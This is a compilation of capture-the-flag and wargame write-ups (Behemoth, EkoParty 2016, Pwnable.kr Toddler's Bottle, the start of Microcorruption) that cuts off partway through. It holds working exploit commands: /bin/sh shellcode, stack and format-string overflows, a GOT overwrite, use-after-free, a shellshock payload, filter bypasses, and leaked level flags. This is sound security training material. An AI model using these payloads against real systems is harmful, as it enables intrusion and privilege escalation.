export EGG=”$(python -c ‘print (“\x90” * 100) + (“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″)’)”
gdb -q ./behemoth3
br *main+95
r
Input: aaaa
x/50x $esp+600
# The 90’s preceding our shellcode start at 0xffffd8b4
”’
Let’s use the magic formula to calculate our format string exploit:

[addr][addr + 2] = \x90\x97\x04\x08\x92\x97\x04\x08
%.[LOB – 8]c = d8b4 = 55476 – 8 = %.55468c
%[offset]$hn = %6\$hn
%.[HOB – LOB]c = ffff – d8b4 = %.10059c
%[offset + 1]$hn = %7\$hn
”’
q
# For this challenge we are going to need to have the payload in a file
cd /tmp
mkdir pancakes
cd pancakes
vi behemoth_3.py
# See behemoth_3.py
python behemoth_3.py
(cat attack.txt ; cat) | /behemoth/behemoth3
cat /etc/behemoth_pass/behemoth4

Flag: ietheishei

Level 4

Solution:
cd /behemoth
ltrace ./behemoth4
# The key point for this challenge is the PID of a program under the tmp folder
# In my case the PID was 8040
objdump -R ./behemoth4
# Notice the fopen and fgetc
ltrace ./behemoth4
echo “babecafe” > /tmp/8040
gdb -q ./behemoth4
disas main
r
# PID not found
q
ltrace ./behemoth4
”’
The PID changes
We are going to need to write a program that runs the application, pauses execution for a few seconds, and creates a symbolic link between the password file and a file with the appropriate PID
We will use the ‘kill’ command for this purpose
”’
cd /tmp
mkdir beh_4
cd beh_4
vi kill_it.sh
# See kill_it.sh
chmod +x kill_it.sh
# Give it execution permissions
./kill_it.sh

Flag: aizeeshing

Level 5

Solution:
cd /behemoth
ltrace ./behemoth5
# Notice fopen() is set to read the password
# Also notice the use of socket and sendto
strings behemoth5
# We can see the host (localhost) and port (1337)
Open another session in another tab
In second tab: netcat -ul 1337
In first tab: ./behemoth5

Flag: mayiroeche

Level 6

Solution:
cd /behemoth
ltrace ./behemoth6_reader
# It attempts to open “shellcode.txt” for reading
ltrace ./behemoth6
# This opens the reader and compares its output to “HelloKitty”
# This means we need to write shellcode that prints out “HelloKitty”
In another tab: vi hello_kitty.asm
# See hello_kitty.asm
nasm -f elf hello_kitty.asm -o hello_kitty.o
ld -m elf_i386 hello_kitty.o -o hello_kitty
objdump -d hello_kitty
# We dump the opcodes to write to shellcode.txt
mkdir /tmp/kitty
cd /tmp/kitty
python -c ‘print “\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0a\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79″‘ > shellcode.txt
/behemoth/behemoth6
cat /etc/behemoth_pass/behemoth7

Flag: baquoxuafo

Level 7

Solution:
cd /behemoth
ltrace ./behemoth7
gdb -q ./behemoth7
r
# Nothing seems to happen
r $(python -c ‘print “A” * 500’)
r $(python -c ‘print “A” * 600’)
# We get a segmentation fault with A’s in EIP
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
# We create a pattern
Copy the output
r $(python -c ‘print “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9″‘)
# Note the output: 0x39724138
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x39724138
# Our offset is at 536
r $(python -c ‘print (“A” * 536) + “BBBB” + (“\x90” * 100) + (“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”)’)
x/50x $esp
# We choose an address in the middle of our NOP sled: 0xffffd460
./behemoth7 $(python -c ‘print (“A” * 536) + (“\x60\xd4\xff\xff”) + (“\x90” * 100) + (“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”)’)
cat /etc/behemoth_pass/behemoth8

Flag: pheewij7Ae

 

EkoParty 2016 CTF Write-Up

What follows is a write-up of the 2016 EkoParty Capture the Flag competition.

Competitors were given a set of challenges which they had to complete to get a flag.

The categories included:

• FBI
• Forensics
• Misc
• Pwning
• Reversing
• Web

[*] Note: Written in the order completed.

 

Challenge: Web – Mr. Robot (25)

Disallow it!

Solution:
Browse to: https://ctf.ekoparty.org/robots.txt
Browse to: https://ctf.ekoparty.org/static/wIMti7Z27b.txt

Flag: EKO{robot_is_following_us}

Challenge: Web – RFC 7230 (50)

Get just basic information from this server (ctf.ekoparty.org).

Solution:
Open up Burp Proxy with Intercept On
Browse to: https://ctf.ekoparty.org/
Right-click -> Do Intercept -> Response to this request

Flag: EKO{this_is_my_great_server}

Challenge: Forensics – Hidden inside EKO (50)

Find the hidden flag in the EKO pixels!

Solution:
stegsolve background.png
Alpha plane 7

Flag: EKO{th3_fl4g}

 

Challenge: FBI – Find me (100)

Now, use your hacker-fu to get the real IP from this service, please use EKO{IP} as the answer.

ssh ekosshlons2uweke.onion

Solution:
torify ssh-keyscan ekosshlons2uweke.onion 2>/dev/null
# Enumerating the public keys
Copy/Paste the output of the above in a file ‘find_me.txt’
ssh-keygen -l -f find_me.txt
# Creating RSA and ECSDA keys
Browse to: https://www.shodan.io/
Search for: 4f:b2:e5:dd:63:86:dd:52:d1:d5:a4:d3:3c:55:e5:2e

Flag: EKO{52.73.16.127}

Challenge: Pwning – Ultra baby (25)

Reach the flag function!

nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 55000

Attachment
pwn25_5ae6e58885e7cd75.zip

Solution:
./r2_ui ultrababy
Actions -> Analyze
# Notice the flag at 0x000007f3
r2 ultrababy
doo
dc
python -c “print ‘A’ * 30”
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Note how it says “Invalid command ‘AAAAA’ (0x41)”
doo
python -c “print ‘A’ * 23 + ‘\x7f3′” | ./ultrababy
# We get a segmentation fault
python -c “print ‘A’ * 24 + ‘\xf3′” | ./ultrababy
# We got our solution
python -c “print ‘A’ * 24 + ‘\xf3′” | nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 55000

Flag: EKO{Welcome_to_pwning_challs_2k16}

Challenge: Reversing – JVM (25)

Bytecodes everywhere, reverse them.

Attachment
rev25_3100aa76fca4432f.zip

Solution:
# Notice the title ‘JVM’ as well as the filename ‘EKO.class’
jad EKO.class
cat EKO.jad
# See EKO.py
python EKO.py

Flag: EKO{893116}

Challenge: Reversing – F#ck (50)

The miracle of the expressive functional programming, is it really functional?

Attachment
rev50_3511a8cd66b371eb.zip

Solution:
file FlagGenerator.exe
# This is a .Net binary
Open Visual Studio -> Tools -> ILSpy -> Open the file
Decompile the program

Flag: EKO{f#ck_this_sh#t}

Challenge: Reversing – RrEeGgEeXx (75)

State-of-the-art on authentication mechanisms.

Attachment
rev75_79816641bfd11577.zip

Solution:
Open Visual Studio -> Tools -> ILSpy -> Open the file
Decompile the program
”’
Note the:

if (Program.check_regex(“^.{40}$”, input)
&& Program.check_regex(“\\w{3}\\{.*\\}”, input)
&& Program.check_regex(“_s.*e_”, input)
&& Program.check_regex(“\\{o{2}O{2}o{2}”, input)
&& Program.check_regex(“O{2}o{2}O{2}\\}”, input)
&& Program.check_regex(“sup3r_r3g3x_challenge”, input))

The flag contains:
1) exactly 40 characters
2) 3 random letters, then { <random characters> }
This translates to EKO{<random>}
3) _s, then random characters, then e_
4) {ooOOoo
5) OOooOO}
6) sup3r_r3g3x_challenge

This translates to: EKO{ooOOoo_sup3r_r3g3x_challenge_OOooOO}
”’

Flag: EKO{ooOOoo_sup3r_r3g3x_challenge_OOooOO}

Challenge: Reversing – Old Times (100)

Grace Hopper will be proud of you! Don’t let her down!

Attachment
rev100_62f48362bc4a0397.zip

Solution:
Open ViewSavF -> Open the file
Library – Part1 – EKOPARTY(PF) -> CHALLENGE1

Flag: EKO{0ld_t1m3s_n3v3r_c0m3_b4ck}

Challenge: Back Again (150)

There are no disassemblers for this kind of program or this is what we think, can you proof otherwise?

Attachment
rev150_9f0cc9207d9c580d.zip

Solution:
dd conv=ascii if=CHALLENGE2.MBR of=CHALLENGE2.txt
# Convert from EBCDIC to ASCII
strings CHALLENGE2.txt
”’
Note:

LNRENTER SECRET KEYCHECKING SECRET KEYOKAY! GRAB YOUR FLAGCA}wN_tfYO_mU_gpPL_yEAtrSEap_GokIVe_E_t3ME3l_T_lHE0b_F0cLA{OG?KEOH SNAP, YOUR KEY IS WRONG!CHALLENGE2

This translates to: EKO{c0b0l_l33t_ekoparty_pgm_ftw}
”’

Flag: EKO{c0b0l_l33t_ekoparty_pgm_ftw}

Challenge: Forensics – Damaged (75)

All you have to do is to see this damaged image!

Attachment
for75_165560e4a08b23f7.zip

Solution:
Read about the BMP file structure: https://en.wikipedia.org/wiki/BMP_file_format
hexedit -b damaged_image.bmp
”’
The corrupt image starts with the DIB header, it doesn’t have the BMP header
The BMP header template is: 42 4d AA AA AA AA 00 00 00 00 BB BB BB BB
Where ‘AA’ is the size of the file and ‘BB’ is the offset of the pixel array
We will change it to: 42 4d 46 00 00 00 00 00 00 00 36 00 00 00
”’
Add the above using Ctrl-A
Ctrl-X
Open the file

Flag: EKO{b1tm4p_r3c}

Challenge: Forensics – Hacker in Disguise (100)

We have captured these codes in a secret communication, please tell us its meaning.

Hint
Hacker In Disguise Uses Sweet Bubbles

Attachment
for100_329717ebd73d0b20.zip

Solution:
# After searching with different parts of the file, we find out that
# this turns out to be a log file of an HID keyboard
# The title itself gave the hint with the first letter of every word: H-I-D-U-S-B
Google: hid keyboard commands
Read: http://www.freebsddiary.org/APC/usb_hid_usages.php
# We build the HID usage table in Python
vi HID_convert.py
# We build a script for HID to ASCII conversion
vi HID-to-ascii.py
python HID-to-ascii.py

Flag: EKO{HOLAPIANOLA}

Challenge: Forensics – Alice Secret Message (175)

There is something fishy here!

Attachment
for175_8ea180f3d676d67d.zip

Solution:
Unzip the image
testdisk PhysicalDrive5
Proceed -> None -> Advanced -> Undelete -> a -> C -> C -> q -> Quit
Open ‘OFICIO.txt’
# Note the strange spacing
# There are eight spaces/tabs per line
# See secret_message.py
python secret_message.py

Flag: EKO{this_is_my_secret_message}

Pwnable.kr – Toddler’s Bottle Write-Up

What follows is a write-up of a system exploitation war game, Pwnable.kr’s Toddler’s Bottle.

The war game has players try to compromise different servers, websites, devices, and applications.  The players get a flag if they succeed in compromising the system.

[*] Status: COMPLETED

Level 0: fd

Goal:
Mommy! what is a file descriptor in Linux?

* try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://www.youtube.com/watch?v=blAxTfcW9VU

ssh fd@pwnable.kr -p2222 (pw:guest)

Solution:

Checking the resources:

ls

Reading the source code:
cat fd.c

Notice that the file descriptor (fd) is the result of our argument minus 0x1234.
If we pass the decimal value of 0x1234, then the fd is set to 0.
A fd of 0 represents standard input.

This all means that if we set fd to 0, we can then pass “LETMEWIN” as the buffer, which gives us a shell.

Getting the decimal value of 0x1234:
python -c ‘print 0x1234’

Getting a shell and the flag:
./fd 4660
LETMEWIN

Flag: mommy! I think I know what a file descriptor is!!

Level 1: collision

Goal:
Daddy told me about cool MD5 hash collision today.
I wanna do something like that too!

ssh col@pwnable.kr -p2222 (pw:guest)

Solution:

Checking the resources:
ls

Reading the source code:
cat col.c

We have several hints on how to complete this challenge.
1) The attack is an MD5 hash collision
2) The hash is 0x21DD09EC
3) Our input has to be 20 bytes long

A hash collision occurs when two input strings of a hash function produce the same hash. This is possible because the hash is a fixed-size value, while the input variations are limitless. See source.

With all the hints provided we know what we have to do.
First, translate the hash to decimal.
Second, divide the decimal value by five, since the input has to be 20 bytes long.
Third, translate the appropriate numbers from decimal to hex.
Fourth, cause the collision.

Translating the hash from hex to decimal:
python -c ‘print 0x21DD09EC’

Decimal: 568134124

Performing the calculations:
python

First value: 454507296
Second value: 113626828

Translating the values to hex:

First value: 0x1b173b20
Second value: 0x6c5cecc

Causing the hash collision:
./col $(python -c ‘print(“\xc8\xce\xc5\x06” * 4 + “\xcc\xce\xc5\x06”)’)

Flag: daddy! I just managed to create a hash collision 🙂

Level 2: bof

Goal:
Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

Solution:

Reading the source code:
cat bof.c

Notice that “overflowme” has a 32-byte buffer. The key is to smash overflowme and put cafebabe in its place.

Inspecting bof in Binary Ninja:

Notice the variable (ebp – 0x2c) and the argument (ebp + 0x8). The argument is what is compared against 0xcafebabe, which means it is what we have to overwrite.

Determining our buffer is simple.
(ebp + 0x8) – (ebp – 0x2c)

Determining the buffer size:
chmod u+x bof
gdb -q ./bof
br *func
r
x $ebp+0x8

x $ebp – 0x2c

python -c ‘print 0xffffd900 – 0xffffd8cc’

We have everything we need. The payload will consist of:
52-byte buffer + 0xcafebabe

Smashing the stack:
(python -c ‘print “A” * 52 + “\xbe\xba\xfe\xca”‘; cat) | nc pwnable.kr 9000
cat flag

 

Flag: daddy, I just pwned a buFFer 🙂

Note: Another simple way to solve this would have been to either dumb fuzz the binary or to send a unique string of a certain length to determine where the offset was.

Level 3: flag

Goal:
Papa brought me a packed present! let’s open it.

Download : http://pwnable.kr/bin/flag

This is reversing task. all you need is binary

Solution:
Checking what the binary is:
file flag

strings flag

The challenge description and the strings output reveal this is a UPX packed file.

Unpacking the file:
upx -d flag -o flag_unpacked

Inspecting the binary in Binary Ninja:

Double-click on 0x496658

We have the flag.

Flag: UPX…? sounds like a delivery service 🙂

Level 4: passcode

Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?

ssh passcode@pwnable.kr -p2222 (pw:guest)

Solution:

Checking the directory contents:
ls -l

Reading the source code:
cat passcode.c

Notice the structure of the program. Main first calls welcome() and then login().
Welcome() takes in a name into a 100-byte buffer. Login() takes in the two passcodes consecutively.

From this we can see that we can reach passcode1 and passcode2 if we overflow name.

Downloading the binary:
scp -P 2222 passcode@pwnable.kr:/home/passcode/passcode ./

Inspecting the binary in Binary Ninja:

Notice in welcome() that ebp-0x70 or var_74 should be “name”.

Notice that ebp-0x10 or var_14 should be “passcode1”.

Calculating the offset:
python -c ‘print 0x70 – 0x10’

We are going to have a 96-byte buffer.

Since our goal is to call system, we are going to overwrite a function in the Global Offset Table (GOT).

We will replace fflush (0x804a004) with our call to system (0x80485ea).

This type of attack is referred to as GOT Overwrite.

All library functions used by a binary, such as printf and system, have an entry in the GOT with the address of where the function is located. Because the addresses are not hardcoded, the libraries are relocated within memory.

By overwriting a GOT entry, we can control the execution flow and jump to any executable address we want, such as system in this case.

For more information on the advantages of GOT overwrite read starting from page 24 of this paper; or read the whole paper!

Translating the call to system from hex to decimal:
python -c “print 0x080485e3”

Overwriting fflush and calling system:
python -c “print (96 * ‘A’) + ‘\x04\xa0\x04\x08’ + ‘134514147’” | ./passcode

Flag: Sorry mom.. I got confused about scanf usage 😦

Level 5: random

Daddy, teach me how to use random value in programming!

ssh random@pwnable.kr -p2222 (pw:guest)

Solution:

Checking the directory contents:
ls -l

Reading the source code:
cat random.c

Notice that rand() is not provided any arguments, hence the output will always be the same.
rand() reference

Our way in is to XOR the non-random value against 0xdeadbeef.

Running rand() to get the non-random value:
cp random.c /tmp/rand.c
vi /tmp/rand.c

Add the following line under “random”:

cd /tmp
gcc rand.c
./a.out

“Random” value: 1804289383

Getting the key:
python -c ‘print 1804289383 ^ 0xdeadbeef’

Key: 3039230856

Getting the flag:
cd
./random

Flag: Mommy, I thought libc random is unpredictable…

Level 6: input

Mom? how can I pass my input to a computer program?

ssh input2@pwnable.kr -p2222 (pw:guest)

Solution:

Checking the directory contents:
ls -l

Reading the source code:
cat input.c

This looks like a very fun exercise. We have to execute a five-stage attack, using different input methods.
We will create our script in /tmp/destroyer_input/ and link the flag afterwards, before execution.

Crafting our exploit:
mkdir /tmp/destroyer_input
cd /tmp/destroyer_input
vi destroyer_input.c

Creating a symbolic link to the flag:
ln -s /home/input2/flag flag

Compiling the program:
gcc destroyer_input.c -o destroyer

Grabbing the flag:
./destroyer

Flag: Mommy! I learned how to pass various input in Linux 🙂

Level 7: leg

Daddy told me I should study arm.
But I prefer to study my leg!

Download : http://pwnable.kr/bin/leg.c
Download : http://pwnable.kr/bin/leg.asm

ssh leg@pwnable.kr -p2222 (pw:guest)

Solution:

Checking the source code:
gedit leg.c

Notice that the solution is the sum of key1, key2, and key3.
We will read the Assembly code in leg.asm in order to figure out what those values are.

From leg.c we can see that we will be dealing with ARM Assembly.

We know this because pc (program counter) is an ARM-specific register.
For more information on ARM, read the following.

• Register-relative and PC-relative expressions
• Processor core registry summary

In ARM, the value of PC is the addr of the current instruction + 8 bytes.
When in Thumb Mode, the value of PC is the addr of the current instruction + 4 bytes.
The program enters Thumb Mode (or ARM Mode) via the bx (branch exchange) instruction.

Checking the disassembly:
gedit leg.asm

key1 / r0 = 0x8cdc + 8

Notice that the program entered Thumb mode.

key2 / r0 = 0xad04 + 4 + 4

Key3 returns LR which is the link register, which stores the return address.

From the documentation:
The LR receives the return address from PC when a Branch and Link (BL) or Branch and Link with Exchange (BLX) instruction is executed.

This translates to:
key3 / r0 = 0x8d80

We now have all the key information needed.

Generating the key:
python -c “print (0x8cdc + 8) + (0x8d04 + 4 + 4) + 0x8d80”

Key: 108400

Getting the flag:
./leg

Flag: My daddy has a lot of ARMv5te muscle!

Level 8: mistake

We all make mistakes, let’s move on.
(don’t take this too seriously, no fancy hacking skill is required at all)

This task is based on real event
Thanks to dhmonkey

hint : operator priority

ssh mistake@pwnable.kr -p2222 (pw:guest)

Solution:

 

Checking the directory contents:
ls -l

Reading the source code:
cat mistake.c

The key here is the XOR. The buffer length is 10 and the characters are XOR’ed against 1.
Hence, we first have to enter 10 zeroes, and then 10 ones in order to pass the challenge.

Bypassing the system:
./mistake
0000000000
1111111111

Flag: Mommy, the operator priority always confuses me 😦

Level 9: shellshock

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure 🙂

ssh shellshock@pwnable.kr -p2222 (pw:guest)

Solution:

Checking the directory contents:
ls -l

 

The name of the challenge and its descriptions lead us to believe it has to do with the shellshock bug.

Shellshock syntax:
env val='() { :;}; <command we want to execute>’ <command that is allowed>

In our case, we will have the shellshock program, which has root privileges, carry and execute our malicious command.

Shellshocking the system:
env val='() { :;}; /home/shellshock/bash -c “cat /home/shellshock/flag”‘ ./shellshock

Flag: only if I knew CVE-2014-6271 ten years ago..!!

Level 10: coin 1

Mommy, I wanna play a game!
(if your network response time is too slow, try nc 0 9007 inside pwnable.kr server)

Running at : nc pwnable.kr 9007

Solution:

”’
Upon connecting to the server, we get the following information:

—————————————————
– Shall we play a game? –
—————————————————

You have given some gold coins in your hand
however, there is one counterfeit coin among them
counterfeit coin looks exactly same as real coin
however, its weight is different from real one
real coin weighs 10, counterfeit coin weighes 9
help me to find the counterfeit coin with a scale
if you find 100 counterfeit coins, you will get reward 🙂
FYI, you have 30 seconds.

– How to play –
1. you get a number of coins (N) and number of chances (C)
2. then you specify a set of index numbers of coins to be weighed
3. you get the weight information
4. 2~3 repeats C time, then you give the answer

– Example –
[Server] N=4 C=2 # find counterfeit among 4 coins with 2 trial
[Client] 0 1 # weigh first and second coin
[Server] 20 # scale result : 20
[Client] 3 # weigh fourth coin
[Server] 10 # scale result : 10
[Client] 2 # counterfeit coin is third!
[Server] Correct!

”’

vi counterfeit_coins.py

#!/usr/bin/python

import socket
import sys
import re

# Establish socket connection
def connect(host, port):
s = None
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error, msg:
s = None
continue
try:
s.connect(sa)
except socket.error, msg:
s.close()
s = None
continue
break
return s

# If the weight is incorrect, then the counterfeit coin is in the current half
# Otherwise, it is in the other half
def weight(current_index, coin_weight, other_index):
if coin_weight != (current_index[1] – current_index[0]) * 10:
return current_index
else:
return (current_index[1], other_index[1])
# Format the index range to string
def getNumbers(i_range):
string_list = []
for i in range(i_range[0], i_range[1]):
string_list.append(str(i))
return ‘ ‘.join(string_list)
def main():
# Uploaded script to server and ran local for more speed
host = ‘localhost’
#host = ‘pwnable.kr’

# Port used by server
port = 9007
s = connect(host, port)
if s is None:
print “[!] Unable to open socket”
sys.exit(1)

# The range to be weighed
index = None
# The range that contains the counterfeit coin
second_range = None

while True:
data = s.recv(1024)
print str(data)

pattern1 = re.compile(“””^N=([0-9]*) C=([0-9]*)$”””)
match1 = pattern1.match(str(data))

pattern2 = re.compile(“””^([0-9]*)$”””)
match2 = pattern2.match(str(data))

# First round
if match1:
first_range = (0, int(match1.group(1)) / 2)
second_range = (0, int(match1.group(1)))
print str(getNumbers(first_range))
s.send(getNumbers(first_range) + “\r\n”)

# Second round
elif match2 and len(match2.group(1)) > 0:
second_range = weight(index, int(match2.group(1)), second_range)
# Get the ceiling value when divided by 2
index = (second_range[0], (second_range[0] + second_range[1]) / 2 + (second_range[0] + second_range[1]) % 2)
print str(getNumbers(index))
s.send(getNumbers(index) + “\r\n”)

elif “format error” in str(data) or “time expired! bye!” in str(data):
break

s.close()

main()
”’
Since the network response time was too slow, we are going to run the script within the server’s /tmp folder
”’

ssh shellshock@pwnable.kr -p2222
vi /tmp/counterfeit_coins.py
<Paste the code>
python /tmp/counterfeit_coins.py

# Note: You may get a “format error” error at times. Just run the script again.

Flag: b1NaRy_S34rch1nG_1s_3asy_p3asy

Level 11: blackjack

Hey! check out this C implementation of blackjack game!
I found it online
* http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html

I like to give my flags to millionares.
how much money you got?

Running at : nc pwnable.kr 9009

Solution:

”’
Notice in the code:

if (bet > cash) //If player tries to bet more money than player has
{
printf(“\nYou cannot bet more money than you have.”);
printf(“\nEnter Bet: “);
scanf(“%d”, &bet);
return bet;
}

While the first check succeeds, there is no check for the second bet.
So this means that we can enter any amount we want the second time.

”’

Are You Ready? : Y
Choice: 1
Enter Bet: $1000000000
Enter Bet: 1000000000
H

# Repeat the process until we win

Flag: YaY_I_AM_A_MILLIONARE_LOL

Level 12: lotto

Mommy! I made a lotto program for my homework.
do you want to play?

ssh lotto@pwnable.kr -p2222 (pw:guest)

Solution:

ls -l
cat lotto.c

”’
Notice in the source code:

// calculate lotto score
int match = 0, j = 0;
for(i=0; i<6; i++){
for(j=0; j<6; j++){
if(lotto[i] == submit[j]){
match++;
}
}
}

// win!
if(match == 6){
system(“/bin/cat flag”);
}
The program compares each input character six times
To win, we need to have six matches
So, we can just enter any equal six characters and eventually win

”’

./lotto
Choice: 1
Keep entering: $$$$$$

# I won on my fourth attempt.

Flag: sorry mom… I FORGOT to check duplicate numbers… 😦

Level 13: cmd1

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

Solution:

ls -l
cat cmd1.c

”’
Notice in the source code:

int filter(char* cmd){
int r=0;
r += strstr(cmd, “flag”)!=0;
r += strstr(cmd, “sh”)!=0;
r += strstr(cmd, “tmp”)!=0;
return r;
}
int main(int argc, char* argv[], char** envp){
putenv(“PATH=/fuckyouverymuch”);
if(filter(argv[1])) return 0;
system( argv[1] );
return 0;
}
This means we can’t use “flag”, “sh”, or “tmp”.
The solution is simple: Use a wildcard.

”’

./cmd1 “/bin/cat f*”

Flag: mommy now I get what PATH environment is for 🙂

Level 14: cmd2

Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission…
but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

Solution:

ls -l
cat cmd2.c

”’

Notice in the source code:

int filter(char* cmd){
int r=0;
r += strstr(cmd, “=”)!=0;
r += strstr(cmd, “PATH”)!=0;
r += strstr(cmd, “export”)!=0;
r += strstr(cmd, “/”)!=0;
r += strstr(cmd, “`”)!=0;
r += strstr(cmd, “flag”)!=0;
return r;
}
This means we can’t use “=”, “PATH”, “export”, “/”, “`”, nor “flag”.
A way around this is to use another character encoding standard, such as octal.

If you don’t have a script to do this, you can use the following website:
http://www.unit-conversion.info/texttools/octal/

Ascii: /bin/sh
Octal: 057 142 151 156 057 163 150

”’

./cmd2 “\$(echo -n ‘\\057\\142\\151\\156\\057\\163\\150’)”
/bin/cat flag

Flag: FuN_w1th_5h3ll_v4riabl3s_haha

Level 15: uaf

Mommy, what is Use After Free bug?

ssh uaf@pwnable.kr -p2222 (pw:guest)

Solution:

ls -l
cat uap.cpp

”’
Notice the following in the source code:

Note in case 2 (after):
len = atoi(argv[1]);
data = new char[len];
read(open(argv[2], O_RDONLY), data, len);
cout << “your data is allocated” << endl;

Which translates to “len” bytes being allocated on the heap and the ptr being in data.
argv1 = len and argv2 = file with the pointer to be read

We will download the binary to explore further.

”’

scp -P 2222 uaf@pwnable.kr:/home/uaf/uaf ./

# We are going to open UAF in Binary Ninja as well as GDB

Drag uaf to Binary Ninja
Ctrl + F -> Man

”’
Notice under the vtable_for_Man, there is xref to 0x401288, where:
mov qword [rax], data_401570

”’

gdb ./uaf
br *main

# We are going to look at 20 addresses starting from 0x401570

x/20a 0x401570

”’
Take note of the output:

0x401570 <_ZTV3Man+16>: 0x40117a <_ZN5Human10give_shellEv> 0x4012d2 <_ZN3Man9introduceEv>

Knowing this, we can now take “give_shell” and feed it to “introduce”.

Calculation: 401570 – 8 = 401568

We can now use this address to take over the machine.
Remember the program takes two parameters, length and file.

”’

python -c “print ‘\x68\x15\x40\x00\x00\x00\x00\x00′” > /tmp/cookies
./uaf 24 /tmp/cookies
3 # free ; delete 48 bytes (man and woman)
2 # after ; add 24 bytes
2 # after ; add 24 bytes
1 # use ; run introduce() (give_shell is now here)
cat flag

Flag: yay_f1ag_aft3r_pwning

Level 16: codemap

I have a binary that has a lot information inside heap.
How fast can you reverse-engineer this?
(hint: see the information inside EAX,EBX when 0x403E65 is executed)

download: http://pwnable.kr/bin/codemap.exe

ssh codemap@pwnable.kr -p2222 (pw:guest)

Solution:
”’
This challenge was geared towards using the Codemap plug-in for IDA.
I don’t have IDA, so this is where I’ll stop.
”’

 

— Toddler’s Bottle Finished — 

Notes on the war game: Very fun and educational challenges.My favorite was the “leg” challenge, as it introduced players to ARM architecture.

 

 

Microcorruption Write-Up

What follows is a write-up of an embedded security capture the flag (CTF), Microcorruption.

The CTF has security researchers try their hands against a TI MSP430 microcontroller.

Players are given a debugger and a device, and they have to find the input that unlocks the device. Every level gets progressively harder and include techniques such as address space layout randomization (ASLR), data execution prevention (DEP), and alphanumeric limitations.

[*] Status: COMPLETED

Level 1: New Orleans

OVERVIEW

– This is the first LockIT Pro Lock.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There is  no default password  on the LockIT  Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro  App and  entering a password  when prompted,  and then
restarting the LockIT Pro using the red button on the back.

This is Hardware  Version A.  It contains  the Bluetooth connector
built in, and one available port  to which the LockIT Pro Deadbolt
should be connected.

Solution:

Break main and type “continue”.

Investigate the create_password function.

Notice “create_password” creates the correct password at address 0x2400.

Type ‘c’ (continue) and then press “Wait”.

Notice in the live memory dump that the correct password is in address 0x2400.

Password: fVk*s!!

Type “solve” and enter the password.

Level 2: Sydney

OVERVIEW

– We have revised the software in revision 02.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There is  no default password  on the LockIT  Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro  App and  entering a password  when prompted,  and then
restarting the LockIT Pro using the red button on the back.

This is Hardware  Version A.  It contains  the Bluetooth connector
